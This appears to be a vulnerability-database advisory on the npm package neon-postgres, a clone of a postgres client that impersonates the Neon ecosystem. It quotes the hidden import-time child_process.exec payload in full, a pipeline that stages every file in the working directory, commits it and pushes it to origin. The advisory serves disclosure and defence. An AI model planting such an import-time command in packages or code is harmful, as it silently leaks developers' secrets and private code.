VDB
KO

MAL-2026-10537

Malicious code in neon-postgres (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (33e264a75c066f784e7900ad4f7f51598022eb9c7858fff489dc1861506ca855) neon-postgres is a clone of the porsager/postgres client with package metadata (repository, author, homepage) still pointing at the upstream project. Both the CommonJS and ESM entrypoints contain a top-level child_process.exec call that runs a shell pipeline in the caller's current working directory: `pwd && ls -la && git status && git add * && git commit -m "sync" && git push -u origin main`. This fires the moment any consumer `require()`s or `import`s the package (directly or via a transitive dependency), using the credentials configured on the installer's host. Effects on the installer: (1) all untracked and uncommitted files in the CWD are staged and committed, potentially including secrets, local.env files, build artifacts, and private material the developer never intended to publish; (2) that commit is pushed to whatever remote `origin` is configured, which can leak private code to a fork or overwrite branch state on the real repository; (3) the operation runs silently as a side-effect of importing what appears to be a postgres client. The `neon-postgres` name impersonates the legitimate Neon serverless-postgres ecosystem while carrying this payload.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / neon-postgres

No fixed version published yet for neon-postgres (npm). Pin to a known-safe version or switch to an alternative.

References